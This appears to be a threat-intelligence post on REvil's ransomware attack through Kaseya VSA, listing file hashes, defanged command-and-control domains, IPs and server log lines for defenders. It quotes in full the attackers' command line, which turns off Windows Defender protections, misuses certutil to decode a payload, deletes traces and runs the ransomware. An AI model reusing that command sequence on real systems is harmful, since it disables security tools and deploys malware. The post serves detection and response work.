The recent ransomware” Kaseya ” which is spreading faster is the biggest ransomware attack on record, which has affected hundreds of businesses globally. Kaseya regularly pushes out updates to its customers meant to ensure the security of its systems. But in this case, those safety features were subverted to push out malicious software to customers systems. The hacker behind this attack is REVIL, the Russian hacker group. The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution. This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. There is no evidence that Kaseya’s VSA codebase has been maliciously modified. Still, the organizations are checking internally as well as with their customers to safeguard them from the attack. Below are the latest indicators of compromise.
Indicators of Compromise
THREAT IDENTIFICATION: Kaseya VSA Ransom Attack
.dll file hashes:
mpsvc.dll
SHA-256 :
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
File executables:
Updater.exe
SHA-256 : dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
agent.exe
SHA-256 : d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
p.exe.TXT
SHA-256 : aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7
svchost.exe
SHA-256 : 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
srnmp.exe
SHA-256 : 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
0299e3c2536543885860c7b61e1efc3f.virus
SHA-256 : df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
be6c46239e9c753de227bf1f3428e271.virus
SHA-256 : 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
a560890b8af60b9824c73be74ef24a46.virus
SHA-256 : 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
agent.crt
SHA-256 : 2093c195b6c1fd6ab9e1110c13096c5fe130b75a84a27748007ae52d9e951643
Command & Controls:
ncuccr[.]org
1team[.]es
4net[.]guru
35-40konkatsu[.]net
123vrachi[.]ru
4youbeautysalon[.]com
12starhd[.]online
101gowrie[.]com
8449nohate[.]org
1kbk[.]com[.]ua
365questions[.]org
321play[.]com[.]hk
candyhouseusa[.]com
andersongilmour[.]co[.]uk
facettenreich27[.]de
blgr[.]be
fannmedias[.]com
southeasternacademyofprosthodontics[.]org
filmstreamingvfcomplet[.]be
smartypractice[.]com
tanzschule-kieber[.]de
iqbalscientific[.]com
pasvenska[.]se
cursosgratuitosnainternet[.]com
bierensgebakkramen[.]nl
c2e-poitiers[.]com
gonzalezfornes[.]es
tonelektro[.]nl
milestoneshows[.]com
blossombeyond50[.]com
thomasvicino[.]com
kaotikkustomz[.]com
mindpackstudios[.]com
faroairporttransfers[.]net
daklesa[.]de
bxdf[.]info
simoneblum[.]de
gmto[.]fr
cerebralforce[.]net
myhostcloud[.]com
fotoscondron[.]com
sw1m[.]ru
homng[.]net
IIS access logs of a compromised VSA server:
POST /dl.asp curl/7.69[.]1
GET /done.asp curl/7.69[.]1
POST /cgi-bin/KUpload.dll curl/7.69[.]1
GET /done.asp curl/7.69.1
POST /cgi-bin/KUpload.dll curl/7.69[.]1
POST /userFilterTableRpt.asp curl/7.69[.]1
IP:
35.226.94[.]113
161.35.239[.]148
162.253.124[.]162
Executed commandline:
“C:\WINDOWS\system32\cmd.exe” /c ping 127.0.0.1 -n 6258 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path – C:\Program Files (x86)\Kaseya\\AgentMon.exe
“C:\Windows\system32\cmd.exe” /c ping 127.0.0.1 -n 5693 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Parent Path – C:\Program Files (x86)\Kaseya\\AgentMon.exe
Also Read : Ransomware Attack: Incident Response Plan and Action Items
Registry Keys: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter
References :
1.https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers
2.https://www.assurainc.com/kaseyas-vsa-supply-chain-ransomware/amp-on/
3.https://blog.talosintelligence.com/2021/07/revil-ransomware-actors-attack-kaseya.html